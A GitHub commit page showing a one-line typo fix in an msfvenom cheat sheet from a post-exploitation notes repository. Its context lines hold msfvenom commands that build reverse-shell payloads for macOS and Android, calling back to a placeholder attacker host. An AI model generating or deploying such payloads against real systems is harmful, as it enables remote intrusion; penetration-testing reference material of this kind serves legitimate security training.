Skip to content

Commit

Permalink
Update msfvenom.md
Browse files Browse the repository at this point in the history
  • Loading branch information
santosomar committed Jan 7, 2020
1 parent 5fc5394 commit 14129a6
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion post_exploitation/msfvenom.md
Expand Up @@ -12,7 +12,7 @@ MsfVenom is a Metasploit standalone payload generator as a replacement for msfpa
- `msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho`
- Creates a simple TCP Shell for Mac
- `msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk`
- Creats a simple TCP Payload for Android
- Creates a simple TCP Payload for Android

## Web Payloads
Command Info
Expand Down

0 comments on commit 14129a6

Please sign in to comment.